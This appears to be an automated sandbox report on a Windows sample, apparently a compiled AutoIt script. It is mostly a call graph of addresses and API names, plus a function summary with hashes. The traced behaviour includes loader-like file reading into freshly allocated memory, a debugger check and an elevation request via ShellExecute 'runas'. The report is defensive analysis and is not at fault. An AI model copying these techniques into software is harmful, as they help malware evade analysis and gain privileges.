111859 403764 111859->111838 111860->111838 111861->111857 111863 43d081 111861->111863 111862 40370c 111872 403114 DeleteObject DestroyWindow Mailbox 111862->111872 111874 411070 10 API calls Mailbox 111863->111874 111869 43d118 111878 40434a 111869->111878 111871->111862 111872->111838 111873->111859 111874->111838 111875->111842 111876->111857 111877->111869 111879 404375 _memset 111878->111879 111892 404182 111879->111892 111881 4043fa 111884 404430 Shell_NotifyIconW 111881->111884 111885 404414 Shell_NotifyIconW 111881->111885 111886 404422 111884->111886 111885->111886 111896 40407c 111886->111896 111888 404429 111888->111828 111889->111859 111890->111828 111891->111852 111893 43d423 111892->111893 111894 404196 111892->111894 111893->111894 111895 43d42c DestroyIcon 111893->111895 111894->111881 111918 462f94 62 API calls _W_store_winword 111894->111918 111895->111894 111897 404098 111896->111897 111898 40416f Mailbox 111896->111898 111899 407a16 59 API calls 111897->111899 111898->111888 111900 4040a6 111899->111900 111901 4040b3 111900->111901 111902 43d3c8 LoadStringW 111900->111902 111903 407bcc 59 API calls 111901->111903 111905 43d3e2 111902->111905 111904 4040c8 111903->111904 111904->111905 111907 4040d9 111904->111907 111906 407b2e 59 API calls 111905->111906 111912 43d3ec 111906->111912 111908 4040e3 111907->111908 111909 404174 111907->111909 111910 407b2e 59 API calls 111908->111910 111911 408047 59 API calls 111909->111911 111914 4040ed _memset _wcscpy 111910->111914 111911->111914 111913 407cab 59 API calls 111912->111913 111912->111914 111915 43d40e 111913->111915 111916 404155 Shell_NotifyIconW 111914->111916 111917 407cab 59 API calls 111915->111917 111916->111898 111917->111914 111918->111881 111919 427c56 111920 427c62 111919->111920 111956 429e08 GetStartupInfoW 111920->111956 111922 427c67 111958 428b7c GetProcessHeap 111922->111958 111924 427cbf 111925 427cca 111924->111925 112041 427da6 58 API calls 3 library calls 111924->112041 111959 429ae6 111925->111959 111928 427cd0 111929 427cdb __RTC_Initialize 111928->111929 112042 427da6 58 API calls 3 library calls 111928->112042 111980 42d5d2 111929->111980 111932 427cea 111933 427cf6 GetCommandLineW 111932->111933 112043 427da6 58 API calls 3 library calls 111932->112043 111999 434f23 GetEnvironmentStringsW 111933->111999 111937 427cf5 111937->111933 111939 427d10 111940 427d1b 111939->111940 112044 4230b5 58 API calls 3 library calls 111939->112044 112009 434d58 111940->112009 111943 427d21 111944 427d2c 111943->111944 112045 4230b5 58 API calls 3 library calls 111943->112045 112023 4230ef 111944->112023 111947 427d34 111948 427d3f __wwincmdln 111947->111948 112046 4230b5 58 API calls 3 library calls 111947->112046 112029 4047d0 111948->112029 111951 427d53 111952 427d62 111951->111952 112047 423358 58 API calls _doexit 111951->112047 112048 4230e0 58 API calls _doexit 111952->112048 111955 427d67 __initptd 111957 429e1e 111956->111957 111957->111922 111958->111924 112049 423187 36 API calls 2 library calls 111959->112049 111961 429aeb 112050 429d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 111961->112050 111963 429af0 111964 429af4 111963->111964 112052 429d8a TlsAlloc 111963->112052 112051 429b5c 61 API calls 2 library calls 111964->112051 111967 429b06 111967->111964 111969 429b11 111967->111969 111968 429af9 111968->111928 112053 4287d5 111969->112053 111972 429b53 112061 429b5c 61 API calls 2 library calls 111972->112061 111975 429b32 111975->111972 111977 429b38 111975->111977 111976 429b58 111976->111928 112060 429a33 58 API calls 3 library calls 111977->112060 111979 429b40 GetCurrentThreadId 111979->111928 111981 42d5de __initptd 111980->111981 111982 429c0b __lock 58 API calls 111981->111982 111983 42d5e5 111982->111983 111984 4287d5 __calloc_crt 58 API calls 111983->111984 111985 42d5f6 111984->111985 111986 42d661 GetStartupInfoW 111985->111986 111987 42d601 __initptd @_EH4_CallFilterFunc@8 111985->111987 111993 42d676 111986->111993 111996 42d7a5 111986->111996 111987->111932 111988 42d86d 112075 42d87d LeaveCriticalSection _doexit 111988->112075 111990 4287d5 __calloc_crt 58 API calls 111990->111993 111991 42d7f2 GetStdHandle 111991->111996 111992 42d805 GetFileType 111992->111996 111993->111990 111994 42d6c4 111993->111994 111993->111996 111995 42d6f8 GetFileType 111994->111995 111994->111996 112073 429e2b InitializeCriticalSectionAndSpinCount 111994->112073 111995->111994 111996->111988 111996->111991 111996->111992 112074 429e2b InitializeCriticalSectionAndSpinCount 111996->112074 112000 434f34 111999->112000 112001 427d06 111999->112001 112076 42881d 58 API calls 2 library calls 112000->112076 112005 434b1b GetModuleFileNameW 112001->112005 112003 434f5a _memmove 112004 434f70 FreeEnvironmentStringsW 112003->112004 112004->112001 112006 434b4f _wparse_cmdline 112005->112006 112008 434b8f _wparse_cmdline 112006->112008 112077 42881d 58 API calls 2 library calls 112006->112077 112008->111939 112010 434d71 __NMSG_WRITE 112009->112010 112011 434d69 112009->112011 112012 4287d5 __calloc_crt 58 API calls 112010->112012 112011->111943 112013 434d9a __NMSG_WRITE 112012->112013 112013->112011 112015 4287d5 __calloc_crt 58 API calls 112013->112015 112016 434df1 112013->112016 112017 434e16 112013->112017 112020 434e2d 112013->112020 112078 434607 58 API calls 2 library calls 112013->112078 112014 422d55 _free 58 API calls 112014->112011 112015->112013 112016->112014 112018 422d55 _free 58 API calls 112017->112018 112018->112011 112079 428dc6 IsProcessorFeaturePresent 112020->112079 112022 434e39 112022->111943 112024 4230fb __IsNonwritableInCurrentImage 112023->112024 112094 42a4d1 112024->112094 112026 423119 __initterm_e 112027 422d40 __cinit 67 API calls 112026->112027 112028 423138 __cinit __IsNonwritableInCurrentImage 112026->112028 112027->112028 112028->111947 112030 4047ea 112029->112030 112040 404889 112029->112040 112031 404824 IsThemeActive 112030->112031 112097 42336c 112031->112097 112035 404850 112109 4048fd SystemParametersInfoW SystemParametersInfoW 112035->112109 112037 40485c 112110 403b3a 112037->112110 112040->111951 112041->111925 112042->111929 112043->111937 112047->111952 112048->111955 112049->111961 112050->111963 112051->111968 112052->111967 112055 4287dc 112053->112055 112056 428817 112055->112056 112058 4287fa 112055->112058 112062 4351f6 112055->112062 112056->111972 112059 429de6 TlsSetValue 112056->112059 112058->112055 112058->112056 112070 42a132 Sleep 112058->112070 112059->111975 112060->111979 112061->111976 112063 435201 112062->112063 112068 43521c 112062->112068 112064 43520d 112063->112064 112063->112068 112071 428b28 58 API calls __getptd_noexit 112064->112071 112066 43522c HeapAlloc 112067 435212 112066->112067 112066->112068 112067->112055 112068->112066 112068->112067 112072 4233a1 DecodePointer 112068->112072 112070->112058 112071->112067 112072->112068 112073->111994 112074->111996 112075->111987 112076->112003 112077->112008 112078->112013 112080 428dd1 112079->112080 112085 428c59 112080->112085 112084 428dec 112084->112022 112086 428c73 _memset ___raise_securityfailure 112085->112086 112087 428c93 IsDebuggerPresent 112086->112087 112093 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 112087->112093 112089 42c5f6 __cftof_l 6 API calls 112090 428d7a 112089->112090 112092 42a140 GetCurrentProcess TerminateProcess 112090->112092 112091 428d57 ___raise_securityfailure 112091->112089 112092->112084 112093->112091 112095 42a4d4 EncodePointer 112094->112095 112095->112095 112096 42a4ee 112095->112096 112096->112026 112098 429c0b __lock 58 API calls 112097->112098 112099 423377 DecodePointer EncodePointer 112098->112099 112162 429d75 LeaveCriticalSection 112099->112162 112101 404849 112102 4233d4 112101->112102 112103 4233f8 112102->112103 112104 4233de 112102->112104 112103->112035 112104->112103 112163 428b28 58 API calls __getptd_noexit 112104->112163 112106 4233e8 112164 428db6 9 API calls __cftof_l 112106->112164 112108 4233f3 112108->112035 112109->112037 112111 403b47 __write_nolock 112110->112111 112112 407667 59 API calls 112111->112112 112113 403b51 GetCurrentDirectoryW 112112->112113 112165 403766 112113->112165 112162->112101 112163->112106 112164->112108 112166 407667 59 API calls 112165->112166 112167 40377c 112166->112167 112296 403d31 112167->112296 112169 40379a 112170 404706 61 API calls 112169->112170 112171 4037ae 112170->112171 112172 407de1 59 API calls 112171->112172 112173 4037bb 112172->112173 112174 404ddd 136 API calls 112173->112174 112297 403d3e __write_nolock 112296->112297 112298 407bcc 59 API calls 112297->112298 112304 403ea4 Mailbox 112297->112304 112300 403d70 112298->112300 112299 4079f2 59 API calls 112299->112300 112300->112299 112309 403da6 Mailbox 112300->112309 112301 4079f2 59 API calls 112301->112309 112302 403e77 112303 407de1 59 API calls 112302->112303 112302->112304 112306 403e98 112303->112306 112304->112169 112305 407de1 59 API calls 112305->112309 112307 403f74 59 API calls 112306->112307 112307->112304 112309->112301 112309->112302 112309->112304 112309->112305 112373 403f74 112309->112373 112374 403f82 112373->112374 112378 403fa4 _memmove 112373->112378 112377 420db6 Mailbox 59 API calls 112374->112377 112375 420db6 Mailbox 59 API calls 112376 403fb8 112375->112376 112376->112309 112377->112378 112378->112375 112669 401055 112674 402649 112669->112674 112672 422d40 __cinit 67 API calls 112673 401064 112672->112673 112675 407667 59 API calls 112674->112675 112676 4026b7 112675->112676 112681 403582 112676->112681 112679 402754 112680 40105a 112679->112680 112684 403416 59 API calls 2 library calls 112679->112684 112680->112672 112685 4035b0 112681->112685 112684->112679 112686 4035bd 112685->112686 112687 4035a1 112685->112687 112686->112687 112688 4035c4 RegOpenKeyExW 112686->112688 112687->112679 112688->112687 112689 4035de RegQueryValueExW 112688->112689 112690 403614 RegCloseKey 112689->112690 112691 4035ff 112689->112691 112690->112687 112691->112690 112692 b597e0 112695 b58e26 112692->112695 112706 b584ad 112692->112706 112694 b598be GetFileSize 112694->112695 112695->112692 112695->112694 112697 b58470 112695->112697 112701 b5987f ReadFile 112695->112701 112702 b59a1f 112695->112702 112705 b589b0 112695->112705 112695->112706 112707 b5b180 112695->112707 112720 b55f10 112695->112720 112698 b55d20 2 API calls 112697->112698 112699 b5851e 112697->112699 112700 b58481 112698->112700 112701->112695 112704 b59a29 SetFilePointerEx 112702->112704 112702->112706 112703 b55d20 2 API calls 112703->112705 112705->112703 112705->112706 112716 b5b0de 112707->112716 112708 b5b2a7 SetFilePointerEx 112709 b5b1df 112708->112709 112712 b5b1c6 112708->112712 112709->112695 112710 b5b196 112711 b5b3a6 112710->112711 112710->112712 112713 b5b3b2 112711->112713 112714 b5b328 SetFilePointerEx 112711->112714 112712->112709 112715 b5b2e0 WriteFile 112712->112715 112713->112695 112714->112695 112715->112695 112716->112707 112716->112708 112716->112710 112716->112714 112717 b5b0d0 SetFilePointerEx 112716->112717 112718 b5b253 112716->112718 112717->112716 112719 b5b054 112717->112719 112718->112695 112719->112695 112722 b55f13 112720->112722 112721 b56084 SetFilePointerEx 112721->112722 112722->112720 112722->112721 112723 b55d90 112722->112723 112723->112695 112724 401016 112729 404974 112724->112729 112727 422d40 __cinit 67 API calls 112728 401025 112727->112728 112730 420db6 Mailbox 59 API calls 112729->112730 112731 40497c 112730->112731 112732 40101b 112731->112732 112736 404936 112731->112736 112732->112727 112737 40493f 112736->112737 112739 404951 112736->112739 112738 422d40 __cinit 67 API calls 112737->112738 112738->112739 112740 4049a0 112739->112740 112741 407667 59 API calls 112740->112741 112742 4049b8 GetVersionExW 112741->112742 112743 407bcc 59 API calls 112742->112743 112744 4049fb 112743->112744 112745 407d2c 59 API calls 112744->112745 112754 404a28 112744->112754 112746 404a1c 112745->112746 112747 407726 59 API calls 112746->112747 112747->112754 112748 404a93 GetCurrentProcess IsWow64Process 112749 404aac 112748->112749 112751 404ac2 112749->112751 112752 404b2b GetSystemInfo 112749->112752 112750 43d864 112764 404b37 112751->112764 112753 404af8 112752->112753 112753->112732 112754->112748 112754->112750 112757 404ad4 112760 404b37 2 API calls 112757->112760 112758 404b1f GetSystemInfo 112759 404ae9 112758->112759 112759->112753 112762 404aef FreeLibrary 112759->112762 112761 404adc GetNativeSystemInfo 112760->112761 112761->112759 112762->112753 112765 404ad0 112764->112765 112766 404b40 LoadLibraryA 112764->112766 112765->112757 112765->112758 112766->112765 112767 404b51 GetProcAddress 112766->112767 112767->112765 112768 401078 112773 40708b 112768->112773 112770 40108c 112771 422d40 __cinit 67 API calls 112770->112771 112772 401096 112771->112772 112774 40709b __write_nolock 112773->112774 112775 407667 59 API calls 112774->112775 112776 407151 112775->112776 112777 404706 61 API calls 112776->112777 112778 40715a 112777->112778 112804 42050b 112778->112804 112781 407cab 59 API calls 112782 407173 112781->112782 112783 403f74 59 API calls 112782->112783 112784 407182 112783->112784 112785 407667 59 API calls 112784->112785 112786 40718b 112785->112786 112787 407d8c 59 API calls 112786->112787 112788 407194 RegOpenKeyExW 112787->112788 112789 43e8b1 RegQueryValueExW 112788->112789 112794 4071b6 Mailbox 112788->112794 112790 43e943 RegCloseKey 112789->112790 112791 43e8ce 112789->112791 112792 43e955 _wcscat Mailbox __NMSG_WRITE 112790->112792 112790->112794 112793 420db6 Mailbox 59 API calls 112791->112793 112792->112794 112801 407de1 59 API calls 112792->112801 112802 403f74 59 API calls 112792->112802 112803 4079f2 59 API calls 112792->112803 112795 43e8e7 112793->112795 112794->112770 112796 40522e 59 API calls 112795->112796 112797 43e8f2 RegQueryValueExW 112796->112797 112798 43e90f 112797->112798 112800 43e929 112797->112800 112799 407bcc 59 API calls 112798->112799 112799->112800 112800->112790 112801->112792 112802->112792 112803->112792 112805 431940 __write_nolock 112804->112805 112806 420518 GetFullPathNameW 112805->112806 112807 42053a 112806->112807 112808 407bcc 59 API calls 112807->112808 112809 407165 112808->112809 112809->112781 112810 dd9303 112811 dd9318 112810->112811 112812 dd69a8 GetPEB 112811->112812 112813 dd9324 112812->112813 112814 dd93d8 112813->112814 112815 dd9342 112813->112815 112832 dd9c88 9 API calls 112814->112832 112819 dd8fe8 112815->112819 112818 dd93bf 112820 dd69a8 GetPEB 112819->112820 112823 dd9087 112820->112823 112822 dd90b8 CreateFileW 112822->112823 112827 dd90c5 112822->112827 112824 dd90e1 VirtualAlloc 112823->112824 112823->112827 112830 dd91e8 CloseHandle 112823->112830 112831 dd91f8 VirtualFree 112823->112831 112833 dd9ef8 GetPEB 112823->112833 112825 dd9102 ReadFile 112824->112825 112824->112827 112826 dd9120 VirtualAlloc 112825->112826 112825->112827 112826->112823 112826->112827 112828 dd92d4 VirtualFree 112827->112828 112829 dd92e2 112827->112829 112828->112829 112829->112818 112830->112823 112831->112823 112832->112818 112834 dd9f22 112833->112834 112834->112822 112835 43fdfc 112839 40ab30 Mailbox _memmove 112835->112839 112837 45617e Mailbox 59 API calls 112852 40a057 112837->112852 112840 40b525 112839->112840 112839->112852 112860 407de1 59 API calls 112839->112860 112864 409f37 Mailbox 112839->112864 112865 47bc6b 341 API calls 112839->112865 112868 40b2b6 112839->112868 112870 409ea0 341 API calls 112839->112870 112871 44086a 112839->112871 112873 440878 112839->112873 112875 44085c 112839->112875 112876 40b21c 112839->112876 112878 420db6 59 API calls Mailbox 112839->112878 112881 456e8f 59 API calls 112839->112881 112885 4057a6 60 API calls 112839->112885 112888 47445a 341 API calls 112839->112888 112889 468715 112839->112889 112893 411fc3 112839->112893 112933 47df23 112839->112933 112936 46d07b 112839->112936 112983 482141 112839->112983 113021 47c2e0 112839->113021 113053 467956 112839->113053 113059 45617e 112839->113059 113064 409c90 59 API calls Mailbox 112839->113064 113068 47c193 85 API calls 2 library calls 112839->113068 113070 469e4a 89 API calls 4 library calls 112840->113070 112843 4409e5 113075 469e4a 89 API calls 4 library calls 112843->113075 112844 440055 113069 469e4a 89 API calls 4 library calls 112844->113069 112845 420db6 59 API calls Mailbox 112845->112864 112848 40b47a 112848->112843 112848->112844 112849 40b475 112853 408047 59 API calls 112849->112853 112851 440064 112853->112852 112856 407667 59 API calls 112856->112864 112858 408047 59 API calls 112858->112864 112859 456e8f 59 API calls 112859->112864 112860->112839 112861 4409d6 113074 469e4a 89 API calls 4 library calls 112861->113074 112863 422d40 67 API calls __cinit 112863->112864 112864->112844 112864->112845 112864->112848 112864->112849 112864->112852 112864->112856 112864->112858 112864->112859 112864->112861 112864->112863 112867 40a55a 112864->112867 113062 40c8c0 341 API calls 2 library calls 112864->113062 113063 40b900 60 API calls Mailbox 112864->113063 112865->112839 113073 469e4a 89 API calls 4 library calls 112867->113073 113067 40f6a3 341 API calls 112868->113067 112870->112839 113071 409c90 59 API calls Mailbox 112871->113071 113072 469e4a 89 API calls 4 library calls 112873->113072 112875->112837 112875->112852 113065 409d3c 60 API calls Mailbox 112876->113065 112878->112839 112879 40b22d 113066 409d3c 60 API calls Mailbox 112879->113066 112881->112839 112885->112839 112888->112839 112890 468723 112889->112890 112891 46871e 112889->112891 112890->112839 113076 4677b3 112891->113076 112894 409a98 59 API calls 112893->112894 112895 411fdb 112894->112895 112897 420db6 Mailbox 59 API calls 112895->112897 112899 446585 112895->112899 112898 411ff4 112897->112898 112901 412004 112898->112901 112902 4057a6 60 API calls 112898->112902 112900 412029 112899->112900 113122 46f574 59 API calls 112899->113122 112909 412036 112900->112909 113123 409b3c 59 API calls 112900->113123 112903 409837 84 API calls 112901->112903 112902->112901 112905 412012 112903->112905 112906 4057f6 67 API calls 112905->112906 112912 412021 112906->112912 112907 4465cd 112908 4465d5 112907->112908 112907->112909 113124 409b3c 59 API calls 112908->113124 112910 405cdf 2 API calls 112909->112910 112914 41203d 112910->112914 112912->112899 112912->112900 113121 4058ba CloseHandle 112912->113121 112915 4465e7 112914->112915 112916 412057 112914->112916 112918 420db6 Mailbox 59 API calls 112915->112918 112917 407667 59 API calls 112916->112917 112920 41205f 112917->112920 112919 4465ed 112918->112919 112921 446601 112919->112921 113125 405850 ReadFile SetFilePointerEx 112919->113125 113099 405572 112920->113099 112927 446605 _memmove 112921->112927 113126 4676c4 59 API calls 2 library calls 112921->113126 112925 41206e 112925->112927 113114 409a3c 112925->113114 112928 412082 Mailbox 112929 4120bc 112928->112929 112930 405c6f CloseHandle 112928->112930 112929->112839 112931 4120b0 112930->112931 112931->112929 113120 4058ba CloseHandle 112931->113120 112934 47cadd 130 API calls 112933->112934 112935 47df33 112934->112935 112935->112839 112937 46d09a 112936->112937 112938 46d0a5 112936->112938 113130 409b3c 59 API calls 112937->113130 112940 46d17f Mailbox 112938->112940 112943 407667 59 API calls 112938->112943 112941 420db6 Mailbox 59 API calls 112940->112941 112979 46d188 Mailbox 112940->112979 112942 46d1c8 112941->112942 112944 46d1d4 112942->112944 112947 4057a6 60 API calls 112942->112947 112945 46d0c9 112943->112945 112949 409837 84 API calls 112944->112949 112946 407667 59 API calls 112945->112946 112948 46d0d2 112946->112948 112947->112944 112951 409837 84 API calls 112948->112951 112950 46d1ec 112949->112950 112952 4057f6 67 API calls 112950->112952 112953 46d0de 112951->112953 112954 46d1fb 112952->112954 112955 40459b 59 API calls 112953->112955 112956 46d233 112954->112956 112957 46d1ff GetLastError 112954->112957 112958 46d0f3 112955->112958 112961 46d295 112956->112961 112962 46d25e 112956->112962 112959 46d218 112957->112959 112960 407b2e 59 API calls 112958->112960 112959->112979 113133 4058ba CloseHandle 112959->113133 112963 46d126 112960->112963 112966 420db6 Mailbox 59 API calls 112961->112966 112964 420db6 Mailbox 59 API calls 112962->112964 112965 46d178 112963->112965 112970 463c37 3 API calls 112963->112970 112967 46d263 112964->112967 113132 409b3c 59 API calls 112965->113132 112971 46d29a 112966->112971 112972 46d274 112967->112972 112974 407667 59 API calls 112967->112974 112973 46d136 112970->112973 112976 407667 59 API calls 112971->112976 112971->112979 113134 47fbce 59 API calls 2 library calls 112972->113134 112973->112965 112975 46d13a 112973->112975 112974->112972 112978 407de1 59 API calls 112975->112978 112976->112979 112980 46d147 112978->112980 112979->112839 113131 463a2a 63 API calls Mailbox 112980->113131 112982 46d150 Mailbox 112982->112965 112984 407667 59 API calls 112983->112984 112985 482158 112984->112985 112986 409837 84 API calls 112985->112986 112987 482167 112986->112987 112988 407a16 59 API calls 112987->112988 112989 48217a 112988->112989 112990 409837 84 API calls 112989->112990 112991 482187 112990->112991 112992 4821a1 112991->112992 112993 482215 112991->112993 113154 409b3c 59 API calls 112992->113154 112995 409837 84 API calls 112993->112995 112997 48221a 112995->112997 112996 4821a6 112998 482204 112996->112998 113001 4821bd 112996->113001 112999 482228 112997->112999 113000 482246 112997->113000 113004 409a98 59 API calls 112998->113004 113002 409a98 59 API calls 112999->113002 113003 48225b 113000->113003 113155 409b3c 59 API calls 113000->113155 113005 40784b 59 API calls 113001->113005 113006 482211 Mailbox 113002->113006 113008 482270 113003->113008 113156 409b3c 59 API calls 113003->113156 113004->113006 113010 4821ca 113005->113010 113006->112839 113009 407f77 59 API calls 113008->113009 113012 48228a 113009->113012 113013 407b2e 59 API calls 113010->113013 113135 45f401 113012->113135 113015 4821d8 113013->113015 113016 40784b 59 API calls 113015->113016 113017 4821f1 113016->113017 113019 407b2e 59 API calls 113017->113019 113018 4821ff 113020 409a3c 59 API calls 113018->113020 113019->113018 113020->113006 113022 407667 59 API calls 113021->113022 113023 47c2f4 113022->113023 113024 407667 59 API calls 113023->113024 113025 47c2fc 113024->113025 113026 407667 59 API calls 113025->113026 113027 47c304 113026->113027 113028 409837 84 API calls 113027->113028 113030 47c312 113028->113030 113029 47c528 Mailbox 113029->112839 113030->113029 113031 407bcc 59 API calls 113030->113031 113032 407924 59 API calls 113030->113032 113033 47c4fb 113030->113033 113034 47c4e2 113030->113034 113036 47c4fd 113030->113036 113039 408047 59 API calls 113030->113039 113042 407e4f 59 API calls 113030->113042 113045 407e4f 59 API calls 113030->113045 113050 407cab 59 API calls 113030->113050 113051 409837 84 API calls 113030->113051 113052 407b2e 59 API calls 113030->113052 113031->113030 113032->113030 113033->113029 113035 409a3c 59 API calls 113033->113035 113037 407cab 59 API calls 113034->113037 113035->113029 113038 407cab 59 API calls 113036->113038 113040 47c4ef 113037->113040 113041 47c50c 113038->113041 113039->113030 113043 407b2e 59 API calls 113040->113043 113044 407b2e 59 API calls 113041->113044 113046 47c3a9 CharUpperBuffW 113042->113046 113043->113033 113044->113033 113047 47c469 CharUpperBuffW 113045->113047 113157 40843a 68 API calls 113046->113157 113049 40c5a7 69 API calls 113047->113049 113049->113030 113050->113030 113051->113030 113052->113030 113054 467962 113053->113054 113055 420db6 Mailbox 59 API calls 113054->113055 113056 467970 113055->113056 113057 46797e 113056->113057 113058 407667 59 API calls 113056->113058 113057->112839 113058->113057 113158 4560c0 113059->113158 113061 45618c 113061->112839 113062->112864 113063->112864 113064->112839 113065->112879 113066->112868 113067->112840 113068->112839 113069->112851 113070->112875 113071->112875 113072->112875 113073->112852 113074->112843 113075->112852 113077 4678ea 113076->113077 113078 4677ca 113076->113078 113077->112890 113079 4677e2 113078->113079 113080 46780a 113078->113080 113084 467821 113078->113084 113079->113080 113086 4677f2 113079->113086 113081 420db6 Mailbox 59 API calls 113080->113081 113082 467800 Mailbox _memmove 113081->113082 113091 420db6 Mailbox 59 API calls 113082->113091 113083 46783e 113083->113082 113087 467877 113083->113087 113088 467869 113083->113088 113084->113083 113085 420db6 Mailbox 59 API calls 113084->113085 113085->113083 113092 420db6 Mailbox 59 API calls 113086->113092 113090 420db6 Mailbox 59 API calls 113087->113090 113089 420db6 Mailbox 59 API calls 113088->113089 113089->113082 113093 46787d 113090->113093 113091->113077 113092->113082 113097 46746b 59 API calls Mailbox 113093->113097 113095 467889 113098 405a15 61 API calls Mailbox 113095->113098 113097->113095 113098->113082 113100 4055a2 113099->113100 113101 40557d 113099->113101 113102 407d8c 59 API calls 113100->113102 113101->113100 113103 40558c 113101->113103 113105 46325e 113102->113105 113107 405ab8 59 API calls 113103->113107 113106 46328d 113105->113106 113127 4631fa ReadFile SetFilePointerEx 113105->113127 113128 407924 59 API calls 2 library calls 113105->113128 113106->112925 113108 46337e 113107->113108 113110 4054d2 61 API calls 113108->113110 113111 46338c 113110->113111 113113 46339c Mailbox 113111->113113 113129 4077da 61 API calls Mailbox 113111->113129 113113->112925 113115 409a87 113114->113115 113116 409a48 113114->113116 113117 408047 59 API calls 113115->113117 113118 420db6 Mailbox 59 API calls 113116->113118 113119 409a5b 113117->113119 113118->113119 113119->112928 113120->112929 113121->112899 113122->112899 113123->112907 113124->112914 113125->112921 113126->112927 113127->113105 113128->113105 113129->113113 113130->112938 113131->112982 113132->112940 113133->112979 113134->112979 113136 407667 59 API calls 113135->113136 113137 45f414 113136->113137 113138 407a16 59 API calls 113137->113138 113139 45f428 113138->113139 113140 45f167 61 API calls 113139->113140 113145 45f44a 113139->113145 113141 45f444 113140->113141 113143 40784b 59 API calls 113141->113143 113141->113145 113142 45f167 61 API calls 113142->113145 113143->113145 113144 40784b 59 API calls 113144->113145 113145->113142 113145->113144 113147 407b2e 59 API calls 113145->113147 113152 45f4c4 113145->113152 113146 40784b 59 API calls 113148 45f4dd 113146->113148 113147->113145 113149 407b2e 59 API calls 113148->113149 113150 45f4e9 113149->113150 113151 407f77 59 API calls 113150->113151 113153 45f4f8 Mailbox 113150->113153 113151->113153 113152->113146 113153->113018 113154->112996 113155->113003 113156->113008 113157->113030 113159 4560e8 113158->113159 113160 4560cb 113158->113160 113159->113061 113160->113159 113162 4560ab 59 API calls Mailbox 113160->113162 113162->113160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d$w
                                                            • API String ID: 0-2400632791
                                                            • Opcode ID: 7259f460c798b8ba9fe974f4e3aa49b655cbc627ef49d170f72214e38dedd4c7
                                                            • Instruction ID: 3f9578aac97f5fa3fb006755216cdc519dc3c25de2528d0d49dd3faf33b4b94a
                                                            • Opcode Fuzzy Hash: 7259f460c798b8ba9fe974f4e3aa49b655cbc627ef49d170f72214e38dedd4c7
                                                            • Instruction Fuzzy Hash: 7CC1552190C340AECB354A248C5AF763FE0EB61720F8DC5DEE57EAA1F3D7259C049A52

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                              • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                              • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                              • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                              • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                              • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                              • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                              • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                              • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                              • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                              • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                              • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                              • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                              • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                              • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                            • API String ID: 529118366-2806069697
                                                            • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                            • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
